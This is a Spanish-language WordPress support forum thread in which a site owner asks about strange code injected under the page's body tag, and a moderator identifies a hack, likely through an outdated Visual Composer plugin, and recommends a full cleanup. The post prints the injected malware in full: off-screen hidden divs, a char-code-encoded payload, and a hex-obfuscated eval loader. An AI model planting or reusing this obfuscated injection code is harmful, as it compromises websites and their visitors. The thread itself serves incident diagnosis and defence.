Soporte » Seguridad » Código extraño en el body

  • Hola!

    Tengo una web hecha en WordPress recién actualizado y limpio (ficheros y BD) y me encuentro este código que aparece de forma aleatoria debajo de la etiqueta <body>:

    <div id="eahqnbfhhng" style="position: absolute; top: -1351px; left: -1467px">aoauah d vdiag ay d - oc td; ld zbac lb iejciauabbmbaajaj, dactbgbmaacl eveqdia sa 27 qcd dyaoabdodbczdzd resdvdtdecpc rebaadfcsa o czdhepc q ec euecdka rb a bg ctak, ajdjatcwbkbbcbckc; e bddhcu dva q cdbkebcecdacbnajbcbe cc bqblaldu dmdp aldj drdza 'echbhcfcrdmdadvdjbfbcdcavab': cacveqe w cbazabaqefc s a icfef: b kcd. bzagbz c hccdcdodadvdiaia pcyaka b bpaa e. mccckaxbebcb masdmcybb cecaapbkaf agaubrbmciameuceciejcd dle lcregegej, a ia uabbr apcudjaz acbcc dbdb. ob w bicrd jdqbndfa tajaxa t alasbg aza gblak bcbbbk, badadjdp aia hbyazclch bldiacahbqcsaccqbedna xbzanc cb weh d ia. mbabgdl asav. d, aawapbuarbtclbqaibaagbqcsa oaddjdp afblahc, bcf bk am a q dacddp axdi a udrdhew aebiegb m ara rab braid gdoajaxb ce ubcc lcic caq abd, b e - ia; cdjbcc ndoa zetdn bpbh boa u aqc xex: diao b aa z a eaibmahbpe aelab baawboct; beb bcuaman b iadbwep e hcq bcatbxdfak ajazaua wbkcveqcjbla mafdbe ebdafajcx a aahbyaybucac cak a, qaqb xdncvakdhaia wbu a qchblbwakabambx djajay dk a laxebbaclb, hewba baaubxdiau - cpdbaoabbwaa, cbblce bbdn. afbrc o dka y aeddagbmdecieadyc vc pb eepa, fdd dnd ddid iejcoemckdu cmc rc, s e iaqc tbbd! cada qbvc ve q dzdwcudjdhbrd. ja oaldd at. dldxcsehd x e lcscvdmbqdg. avand g acdmetdnckcibncsdedo eq</div>
    <div id="unkxjkibmns" style="position: absolute; top: -1894px; left: -1518px">108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 61 40 43 91 119 105 110 100 111 119 46 115 105 100 101 98 97 114 93 41 59 112 121 105 112 113 101 102 104 101 101 99 107 97 61 91 34 114 118 58 49 49 34 44 34 77 83 73 69 34 44 93 59 102 111 114 40 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 61 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 59 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 60 112 121 105 112 113 101 102 104 101 101 99 107 97 46 108 101 110 103 116 104 59 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 43 43 41 123 105 102 40 110 97 118 105 103 97 116 111 114 46 117 115 101 114 65 103 101 110 116 46 105 110 100 101 120 79 102 40 112 121 105 112 113 101 102 104 101 101 99 107 97 91 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 93 41 62 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 41 123 108 114 109 101 116 116 99 112 97 108 104 106 103 61 112 121 105 112 113 101 102 104 101 101 99 107 97 46 108 101 110 103 116 104 45 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 59 98 114 101 97 107 59 125 125 105 102 40 110 97 118 105 103 97 116 111 114 46 117 115 101 114 65 103 101 110 116 46 105 110 100 101 120 79 102 40 34 77 83 73 69 49 48 34 41 62 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 41 123 108 114 109 101 116 116 99 112 97 108 104 106 103 43 43 59 125 106 117 99 107 114 100 102 106 116 105 119 61 108 114 109 101 116 116 99 112 97 108 104 106 103 45 49 59 117 119 122 108 97 99 102 120 99 100 112 105 101 122 61 34 120 117 117 67 50 103 108 57 103 100 71 116 90 85 81 34 59 97 115 113 118 107 113 112 108 112 98 98 119 120 118 100 98 116 122 61 100 111 99 117 109 101 110 116 46 103 101 116 69 108 101 109 101 110 116 66 121 73 100 40 34 101 97 104 113 110 98 102 104 104 110 103 34 41 46 105 110 110 101 114 72 84 77 76 59 121 121 105 107 108 99 116 116 105 107 117 111 104 61 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 59 121 111 117 97 115 110 109 102 103 112 104 101 110 116 98 98 97 61 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 59 117 97 117 121 106 103 100 100 100 112 108 120 120 117 114 61 34 34 59 102 111 114 40 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 61 108 118 117 114 108 106 111 120 111 111 109 116 115 113 105 59 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 60 97 115 113 118 107 113 112 108 112 98 98 119 120 118 100 98 116 122 46 108 101 110 103 116 104 59 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 43 61 106 117 99 107 114 100 102 106 116 105 119 41 123 111 119 105 114 111 98 119 118 122 100 97 97 61 97 115 113 118 107 113 112 108 112 98 98 119 120 118 100 98 116 122 46 99 104 97 114 67 111 100 101 65 116 40 121 122 106 105 115 117 115 109 107 102 120 121 122 113 115 119 41 59 105 102 40 111 119 105 114 111 98 119 118 122 100 97 97 62 61 57 55 38 38 111 119 105 114 111 98 119 118 122 100 97 97 60 61 49 50 50 41 123 105 102 40 121 121 105 107 108 99 116 116 105 107 117 111 104 37 108 114 109 101 116 116 99 112 97 108 104 106 103 41 123 117 97 117 121 106 103 100 100 100 112 108 120 120 117 114 43 61 83 116 114 105 110 103 46 102 114 111 109 67 104 97 114 67 111 100 101 40 40 40 120 117 101 99 102 105 109 108 97 109 110 104 43 111 119 105 114 111 98 119 118 122 100 97 97 45 57 55 41 94 117 119 122 108 97 99 102 120 99 100 112 105 101 122 46 99 104 97 114 67 111 100 101 65 116 40 121 111 117 97 115 110 109 102 103 112 104 101 110 116 98 98 97 37 117 119 122 108 97 99 102 120 99 100 112 105 101 122 46 108 101 110 103 116 104 41 41 37 50 53 53 41 59 121 111 117 97 115 110 109 102 103 112 104 101 110 116 98 98 97 43 43 59 125 101 108 115 101 123 120 117 101 99 102 105 109 108 97 109 110 104 61 40 111 119 105 114 111 98 119 118 122 100 97 97 45 57 55 41 42 50 54 59 125 121 121 105 107 108 99 116 116 105 107 117 111 104 43 43 59 125 125 91 93 91 34 99 111 110 115 116 114 117 99 116 111 114 34 93 91 34 99 111 110 115 116 114 117 99 116 111 114 34 93 40 117 97 117 121 106 103 100 100 100 112 108 120 120 117 114 41 40 41 59</div>
    <script>
    var whxpjldsgbn="\x53";
    var qqenulinnemjty="\x28";
    var paqttvfzlwnyc="\x29";
    qqenulinnemjty+="\x22\x75\x6e";
    whxpjldsgbn+="\x74\x72";
    var ymefitghkiu="\x69";
    ymefitghkiu+="\x6e";
    var gyjeluwgmgiteb="\x64\x6f\x63";
    qqenulinnemjty+="\x6b\x78\x6a";
    gyjeluwgmgiteb+="\x75\x6d";
    gyjeluwgmgiteb+="\x65\x6e";
    var ntygammcps="\x2e\x61";
    ymefitghkiu+="\x6e\x65\x72\x48\x54";
    qqenulinnemjty+="\x6b";
    whxpjldsgbn+="\x69";
    whxpjldsgbn+="\x6e";
    whxpjldsgbn+="\x67\x2e\x66\x72\x6f";
    var nglpebadlumij="\x2e\x73\x70\x6c\x69\x74\x28";
    var kzoeoishqbh="\x65\x76\x61\x6c";
    var jmezajupjpjh="\x28";
    gyjeluwgmgiteb+="\x74\x2e\x67";
    gyjeluwgmgiteb+="\x65";
    ntygammcps+="\x70";
    ymefitghkiu+="\x4d\x4c";
    ntygammcps+="\x70\x6c\x79\x28\x6e\x75\x6c";
    ntygammcps+="\x6c";
    ntygammcps+="\x2c";
    qqenulinnemjty+="\x69";
    gyjeluwgmgiteb+="\x74\x45\x6c";
    nglpebadlumij+="\x22";
    qqenulinnemjty+="\x62\x6d\x6e\x73";
    qqenulinnemjty+="\x22\x29\x2e";
    nglpebadlumij+="\x20\x22\x29";
    gyjeluwgmgiteb+="\x65\x6d";
    gyjeluwgmgiteb+="\x65";
    gyjeluwgmgiteb+="\x6e\x74\x42\x79\x49\x64";
    whxpjldsgbn+="\x6d\x43\x68";
    whxpjldsgbn+="\x61";
    nglpebadlumij+="\x29";
    whxpjldsgbn+="\x72\x43\x6f\x64\x65";
    this[kzoeoishqbh](kzoeoishqbh + jmezajupjpjh + whxpjldsgbn + ntygammcps + gyjeluwgmgiteb + qqenulinnemjty + ymefitghkiu + nglpebadlumij + paqttvfzlwnyc);
    </script>

    ¿A qué es debido?

Viendo 3 respuestas - de la 1 a la 3 (de un total de 3)
  • Moderador Jose Conti

    (@jconti)

    Hola,

    ¿Dices que es un WordPress recién instalado? ¿WordPress descargado nuevo y reinstalado desde cero?

    ¿Has instalado algún theme que te hayas descargado de algún lado? ¿Plugins que no te hayas descargado desde WordPress.org?

    Sinceramente te lo digo, este código tiene muy mala pinta. Haga lo que haga, no está dentro de lo que debería hacer algo normal seguro, ya que solo por el código CSS está claro que quiere esconder lo que hace o muestra, ya que lo sitúa fuera de navegador:

    <div id="eahqnbfhhng" style="position: absolute; top: -1351px; left: -1467px">
    <div id="unkxjkibmns" style="position: absolute; top: -1894px; left: -1518px">

    Seguro que esto no te sale con una instalación limpia sin nada instalado, ni plugins ni themes.

    Iniciador del debate testeadorblog

    (@testeadorblog)

    Hola Jose!

    Es un WordPress instalado hace más de dos años actualizado a la última versión y todos los plugins instalados desde la página oficial de WordPress.

    Versión: 4.4.2

    Theme: Goodword 3.3.3 (KrownThemes)

    Plugins:

    Google Language Translator: 5.0.05
    iThemes Security: 5.2.1
    Krown Portfolio: 0.3
    Límitador de intentos de login: 1.7.1
    PHPEnkoder: 1.13
    Revolution Slider: 4.6.5
    Wordfence Security: 6.0.24
    WPBakery Visual Composer: 4.1

    ¿Qué opinas?

    Moderador Jose Conti

    (@jconti)

    Ok,

    Había entendido que era una instalación limpia.

    Lo que pasa, sintiéndolo mucho, es que te han hackeado la web. A demás, te puedo casi asegurar por donde han accedido, que es mediante Visual Composer, que lo tiene en la versión 4.1 según lo que indicas.

    Todas las versiones inferiores a la versión 4.7.4, tienen vulnerabilidad es muy graves http://www.mojomarketplace.com/dojo/security-announcement-visual-composer-plugin-vulnerability/

    ¿Tienes copia de seguridad de la web? El problema es que igual el hackeo es muy antiguo.

    Deberías conseguir copias limpias del theme, y luego asegurarte que todos los plugins están actualizados, comenzando por Visual Composer.

    Piensa que lo suyo es realizar una limpieza completa de la web, que te llevará muchas horas, pero es la única forma que te asegures que está limpio seguro.

    Sigue estas instrucciones:

    https://es.forums.wordpress.org/topic/limpiar-un-wordpress-infectadohackeado?replies=1

Viendo 3 respuestas - de la 1 a la 3 (de un total de 3)
  • El debate ‘Código extraño en el body’ está cerrado a nuevas respuestas.